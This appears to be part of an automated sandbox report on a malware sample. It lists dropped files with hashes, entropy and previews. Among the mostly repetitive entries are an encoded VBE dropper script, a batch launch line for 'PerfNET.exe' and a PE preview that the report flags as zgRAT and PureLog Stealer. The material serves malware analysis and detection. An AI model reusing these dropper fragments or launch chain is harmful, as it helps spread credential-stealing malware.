                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.78412177169147
                                                    Encrypted:false
                                                    SSDEEP:6:GEwqK+NkLzWbH1rFnBaORbM5nCyhjZO/17R1:G1MCzWL1hBaORbQCyjwl
                                                    MD5:E30EC43C2CEF82698F68268735844CC5
                                                    SHA1:2AD9967DD2D1087FBE3DC96D79C49F08A17D38F9
                                                    SHA-256:F6E612F2AA1D27D9C070EA07A69C4C0C9BED6E308198857EE7A1335AD7AEF48B
                                                    SHA-512:94EC05A7ED4F1DC0A59C12E394C651290E31B12B37A0EA80E73C362C8D1AAD6BFEBB2C6A87790EE9E59164EF3A16F8282695CCF94EFFA6D4570989621E1CAEC8
                                                    Malicious:true
                                                    Preview:#@~^ugAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrY:+ha]Jmtmk.8DKhd+MIn-b+hgnYJz*k65461c4CYES,!SP6CVk+gTsAAA==^#~@.
                                                    Process:C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):82
                                                    Entropy (8bit):5.061956505136041
                                                    Encrypted:false
                                                    SSDEEP:3:xvPMG2vAHmWFvKSWAXmBSIu+TEAs1Pw+dx:pz2YHmAJHUjuQuwQx
                                                    MD5:E76AF187B94B636B1C61AC0419E5B8A8
                                                    SHA1:03A8761DEF6FAB98121EFC99256FEF93B3391781
                                                    SHA-256:CA364AB0BDCEA783A389667F2B41CE4FF5CA304172422D398E947D5D6A4E5B20
                                                    SHA-512:F2BEAA0D4472ECA942519F56AAC4C0DA1DA13D7E9CED01493ADEC053B9ABC4802FAD8A60B7CA2627E2349F16E6F19CA034137C3322CA7167A126856CCE1DACEC
                                                    Malicious:false
                                                    Preview:%qJoCHXK%%HTUQ%..%bKYX%"%Temp%\chainbrowserReviewNet/PerfNET.exe"%IEClBkEUktdYiRI%
                                                    Process:C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (428), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):428
                                                    Entropy (8bit):5.839453956682053
                                                    Encrypted:false
                                                    SSDEEP:12:N6IsIiVHf1dhvIueksG0Sfbzvm8MC55eV3U1+W:NIIeHfZT0E/beV3Kp
                                                    MD5:87D7038E4B5C34604D49D3700883E708
                                                    SHA1:2ECEEAF527C83A6BCC1AB13E0CFDBAFF3599DF16
                                                    SHA-256:22EBEEDD36C37D2CB9425D7B0BB4DBDC89232A1F0A2B9C04C92BEDF896A49467
                                                    SHA-512:63728A0BA57C672E7624756A944E391E49568887CC5406C916E3975060B66C92B4E11795822D6ABCA814969A2D99576528BFC4EFE7DA3B9DF8156ADFC07BA415
                                                    Malicious:false
                                                    Preview:VTv2gs1Y6avPmwondipjK4vk3TErn7WbWUvad0LeRbBzdub7x5MNODQahL9NnKv8DU3RAOJnXKRs36HI2G4svIMSEV2S071HqCvJ1J7jvi0EvhglD0UhPCN5IkMoV0wZTKC1L8RsJV7MSIhhyROAmT1oy0AR6SN4wavlfoaFjmY4FBm9Dp0Dlww9SXCU79v0HCZ1X5BJ1JaA57jxNBORcKTAovTHmFIj0hwClumHnqMcVvDUyOH6veY7tZNlm4hvA1KYLgMcYGnw80p2r8SX8MxWIzTLhBftIacdlpJSBohp0m92uU3olJxyDyQWMB5Wk4nhYLRCyAVToIfgzabNI0H9mnawZxFAsLE59bejC00lxdK5StgwkrOtxn5uvfnA4VkdDkgY61KRAfLIdedpRTaA6UHVgtxhMzqc2q2sNIzs
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
